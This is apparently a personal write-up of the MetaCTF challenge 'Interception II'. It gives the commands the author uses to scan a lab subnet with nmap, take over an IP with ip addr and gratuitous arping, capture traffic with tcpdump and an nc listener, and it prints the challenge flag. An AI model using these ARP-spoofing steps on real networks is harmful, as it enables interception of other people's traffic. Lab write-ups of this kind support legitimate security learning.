Interception II

Instructions

Pasted image 20220908162423

Hints

Pasted image 20220908162431

Solution

Pasted image 20220908162442

ssh ctf-46ed3559da08@host.cg21.metaproblems.com -p 7000

I guess I can nmap for port 8000 being open on here:

nmap -Pn -T4 --max-retries 0 -p 8000 192.168.0.1-254

Seems like that was the right call, theres just one open port when I grep the results, now just have to find it… Pasted image 20220908163448 Looks like it's 192.168.0.78: Pasted image 20220908163459 Now I guess I'll try the same thing? Add ip address to eth0 then arp spoof?

ip link
ip addr add 192.168.0.78 dev eth0
ip a

Pasted image 20220908163528 Then started tcpdump on port 8000.

tcpdump -i eth0 tcp port 8000 -XAvv -w tcp_8000.pcap &

Now I need to hit all the hosts in the subnet with my arping.

arping -c 1 -U -s 192.168.0.2 -I eth0 192.168.0.1

# had to update to for loop
for i in $(seq 1 254); do arping -c 1 -U -s 192.168.0.78 -I eth0 192.168.0.$i; done

Well that worked splendidly. Pasted image 20220908163724 I did the same thing with the tcpdump and base64 encoding it to pull it over to wireshark, but the pcap was full of SYN then RST, ACK packets. Pasted image 20220908163735 Yeah dummy because it's TCP, needs handshake. Need to open up nc listener. Pasted image 20220908163748 Flag:

MetaCTF{s0_m4ny_1ps_but_wh1ch_t0_ch00s3}

Oh damn, I was the 54th person to solve this particular challenge! Pasted image 20220908163824


Next: Interception 3